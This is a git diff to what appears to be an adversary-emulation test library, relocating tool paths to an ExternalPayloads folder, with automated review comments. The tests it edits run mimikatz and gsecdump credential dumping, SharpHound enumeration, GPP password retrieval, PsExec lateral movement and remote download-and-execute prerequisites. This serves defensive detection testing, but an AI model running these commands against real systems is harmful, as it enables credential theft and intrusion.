diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index d9121d50..6402656b 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -19,7 +19,7 @@ atomic_tests: gsecdump_exe: description: Path to the Gsecdump executable type: path - default: PathToAtomicsFolder\T1003\bin\gsecdump.exe + default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe gsecdump_bin_hash: description: File hash of the Gsecdump binary file type: string diff --git a/atomics/T1049/T1049.yaml b/atomics/T1049/T1049.yaml index f1b647be..e627d7cf 100644 --- a/atomics/T1049/T1049.yaml +++ b/atomics/T1049/T1049.yaml @@ -66,7 +66,7 @@ atomic_tests: SharpView: description: Path of the executable opensource redteam tool used for the performing this atomic. type: path - default: PathToAtomicsFolder\T1049\bin\SharpView.exe + default: PathToAtomicsFolder\..\ExternalPayloads\SharpView.exe syntax: description: Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. type: string diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 289d982d..90427407 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml 
@@ -25,23 +25,18 @@ atomic_tests: Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. supported_platforms: - windows - input_arguments: - file_path: - description: File path for SharpHound payload - type: string - default: PathToAtomicsFolder\T1059.001\src dependency_executor_name: powershell dependencies: - description: | - SharpHound.ps1 must be located at #{file_path} + SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" prereq_command: | - if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1} get_prereq_command: | - Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" executor: command: | - write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan - import-module #{file_path}\SharpHound.ps1 + import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1" Invoke-BloodHound -OutputDirectory $env:Temp Start-Sleep 5 cleanup_command: | diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 8021e38b..46f9de59 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
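Review bot: The `file_path` input argument is removed and every reference inside this hunk is replaced by the literal ExternalPayloads path, but `cleanup_command: |` is the hunk's last line and its body continues outside the hunk; confirm it no longer contains `#{file_path}`, which would now be emitted unsubstituted. The dropped `write-host` line was the only runtime indication of which script was imported; if that output is still wanted, keep it as `write-host "Import and Execution of SharpHound.ps1 from PathToAtomicsFolder\..\ExternalPayloads" -ForegroundColor Cyan`. Pinning the Invoke-WebRequest URL to a commit SHA keeps the prereq reproducible, which the T1559 hunks in this commit do not yet do for their helper script.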
@@ -593,6 +593,7 @@ atomic_tests: prereq_command: | if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null new-item -path "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt" | Out-Null echo "A machine list file has been generated at "PathToAtomicsFolder\..\ExternalPayloads\T1105MachineList.txt". Please enter the machines to target there, one machine per line." executor: @@ -774,13 +775,9 @@ atomic_tests: description: Destination path to file type: path default: $env:TEMP\Atomic-license.txt - local_nimgrab: - description: Local path to nimgrab - type: path - default: PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe executor: command: | - cmd /c nimgrab.exe #{remote_file} #{destination_path} + cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path} cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt 
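Review bot: The rewritten executor line `cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}` already runs under `name: command_prompt`, so `cmd /c` starts a redundant second cmd.exe whose quote-stripping rules depend on the substituted paths; `"PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}` is equivalent and simpler. Removing `local_nimgrab` also removes the only way to point the test at an already-installed nimgrab, so the dependency description `NimGrab must be installed on system.` in the next hunk should name the ExternalPayloads path it now requires. The `destination_path` default `$env:TEMP\Atomic-license.txt` is PowerShell syntax that cmd.exe will not expand unless the framework substitutes it first; this predates the change but is worth checking while this executor is being edited.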
@@ -789,13 +786,12 @@ atomic_tests: - description: | NimGrab must be installed on system. prereq_command: | - if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe") {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile PathToAtomicsFolder\..\ExternalPayloads\nim.zip Expand-Archive -Path PathToAtomicsFolder\..\ExternalPayloads\nim.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\nim -Force - Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim - Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\nim\nim-1.6.6\bin\nimgrab.exe "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" - name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 description: | diff --git a/atomics/T1218/T1218.yaml b/atomics/T1218/T1218.yaml index e52ca500..29378d13 100644 --- a/atomics/T1218/T1218.yaml +++ b/atomics/T1218/T1218.yaml @@ -154,7 +154,7 @@ atomic_tests: renamed_binary: description: renamed Microsoft.Workflow.Compiler type: path - default: PathToAtomicsFolder\T1218\src\svchost.exe + default: PathToAtomicsFolder\..\ExternalPayloads\svchost.exe mwcpath: description: Default location of Microsoft.Workflow.Compiler.exe type: path 
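Review bot: The two `Remove-Item` lines for `PathToAtomicsFolder\..\ExternalPayloads\nim` and `...\nim.zip` are dropped, so after the new `Copy-Item` the whole extracted Nim distribution and the zip remain under ExternalPayloads; keep the cleanup after the copy, and give the directory removal the flags it needs to succeed non-interactively on a populated tree: `Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim -Recurse -Force` and `Remove-Item PathToAtomicsFolder\..\ExternalPayloads\nim.zip -Force`. The archive is fetched with no checksum comparison, which predates this change; if one is wanted, the `gsecdump_bin_hash` pattern used by T1003 in this same commit would fit. The dependency list continues outside the hunk.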
@@ -168,10 +168,10 @@ atomic_tests: - description: | .Net must be installed for this test to work correctly. prereq_command: | - Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} get_prereq_command: | - write-host "you need to rename workflow complier before you run this test" + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force executor: command: | #{renamed_binary} #{xml_payload} output.txt diff --git a/atomics/T1220/T1220.yaml b/atomics/T1220/T1220.yaml index 18e8357c..24508374 100644 --- a/atomics/T1220/T1220.yaml +++ b/atomics/T1220/T1220.yaml @@ -22,7 +22,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | @@ -44,6 +44,7 @@ atomic_tests: prereq_command: | if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" executor: command: | @@ -72,7 +73,7 @@ atomic_tests: msxsl_exe: description: Location of the MSXSL executable. type: path - default: PathToAtomicsFolder\T1220\bin\msxsl.exe + default: PathToAtomicsFolder\..\ExternalPayloads\msxsl.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml index b98ced22..0288f014 100644 --- a/atomics/T1552.004/T1552.004.yaml +++ b/atomics/T1552.004/T1552.004.yaml 
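Review bot: The added `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\"` creates the fixed default folder rather than the parent of `#{renamed_binary}`, so when a caller overrides `renamed_binary` the following `Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force` still fails on a missing directory; `New-Item -Type Directory (Split-Path "#{renamed_binary}") -ErrorAction Ignore -Force | Out-Null` covers both cases, which is the `Split-Path` approach the T1569.002 hunk in this commit already takes. The second T1220 hunk has the same mismatch between the directory it creates and `-OutFile "#{msxsl_exe}"`. Moving `Copy-Item` out of `prereq_command` is correct, since the check should no longer have side effects.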
@@ -290,7 +290,7 @@ atomic_tests: mimikatz_exe: description: Path of the Mimikatz binary type: string - default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe + default: PathToAtomicsFolder\..\ExternalPayloads\x64\mimikatz.exe dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1552.006/T1552.006.yaml b/atomics/T1552.006/T1552.006.yaml index 372d33d4..f5908e7f 100644 --- a/atomics/T1552.006/T1552.006.yaml +++ b/atomics/T1552.006/T1552.006.yaml @@ -38,7 +38,7 @@ atomic_tests: gpp_script_path: description: Path to the Get-GPPPassword PowerShell Script type: path - default: PathToAtomicsFolder\T1552.006\src\Get-GPPPassword.ps1 + default: PathToAtomicsFolder\..\ExternalPayloads\Get-GPPPassword.ps1 dependency_executor_name: powershell dependencies: - description: | diff --git a/atomics/T1559/T1559.yaml b/atomics/T1559/T1559.yaml index a27c1b54..86962eaa 100644 --- a/atomics/T1559/T1559.yaml +++ b/atomics/T1559/T1559.yaml 
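Review bot: `mimikatz_exe` keeps `type: string` while every other binary-path argument touched in this commit (`gsecdump_exe`, `SharpView`, `msxsl_exe`, `renamed_binary`, `gpp_script_path`) is `type: path`; change it to `type: path` so the framework treats the value consistently. The new default adds an `x64` subfolder under ExternalPayloads, which only resolves if the dependency's get_prereq (outside this hunk) extracts mimikatz into that exact subfolder rather than the folder root; confirm against the dependency block.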
@@ -15,15 +15,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 1 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 1 name: command_prompt - name: Cobalt Strike Lateral Movement (psexec_psh) pipe 
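Review bot: Unlike the T1059.001, T1105, T1218 and T1220 hunks in this commit, none of the five T1559 hunks creates `PathToAtomicsFolder\..\ExternalPayloads` before `Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads"`, so on a machine where no other test has run the fetch presumably fails unless Invoke-FetchFromZip creates its destination; add `New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null` before it. The `IEX (iwr ".../invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1")` context line executes whatever is on the master branch at run time; pinning it to a commit, as the T1059.001 hunk does for SharpHound.ps1, would make the prereq reproducible. The same applies to the four following hunks (pipes 2 through 5).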
@@ -39,15 +39,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 2 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 2 name: command_prompt - name: Cobalt Strike SSH (postex_ssh) pipe 
@@ -63,15 +63,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 3 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 3 name: command_prompt - name: Cobalt Strike post-exploitation pipe (4.2 and later) 
@@ -87,15 +87,15 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 4 name: command_prompt - name: Cobalt Strike post-exploitation pipe (before 4.2) 
@@ -111,13 +111,13 @@ atomic_tests: - description: | Named pipe executors must exist on disk prereq_command: | - if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1} + if ((Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_server.exe)) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) $zipUrl = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip" - Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin" + Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\..\ExternalPayloads" executor: command: | - "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5 + "PathToAtomicsFolder\..\ExternalPayloads\build\namedpipes_executor.exe" --pipe 5 name: command_prompt diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index 170e79d6..c06ea1a7 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml 
@@ -119,13 +119,23 @@ atomic_tests: description: Target hostname to attempt psexec connection to for emulation of lateral movement. type: string default: $ENV:COMPUTERNAME + dependencies: + - description: | + PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" + prereq_command: | + if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" + Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force + New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") -Force | Out-Null + Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force executor: command: | cmd.exe /c "wmic csproduct get UUID" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:1" cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:1" reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f - copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp + copy "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" $env:temp cmd.exe /c "$env:temp\psexec.exe -accepteula \\#{targethost} cmd.exe /c echo "--access-token"" cleanup_command: | reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f diff --git a/atomics/T1569.002/bin/PsExec.exe b/atomics/T1569.002/bin/PsExec.exe deleted file mode 100644 index 610baee0..00000000 Binary files a/atomics/T1569.002/bin/PsExec.exe and /dev/null differ
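Review bot: In the new `get_prereq_command`, `Invoke-WebRequest ... -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"` and `Expand-Archive` run before the `New-Item -ItemType Directory (Split-Path ...)` line, so on a checkout where ExternalPayloads does not exist yet the download fails before the directory is created; move the `New-Item` line to the top of the block. After `Copy-Item`, `PsTools.zip` and the extracted `PsTools` folder are left behind; remove both with `Remove-Item` once the copy has succeeded. The block uses PowerShell cmdlets, so `dependency_executor_name: powershell` is needed if this test's executor is not already PowerShell; the executor's `name:` is outside the hunk.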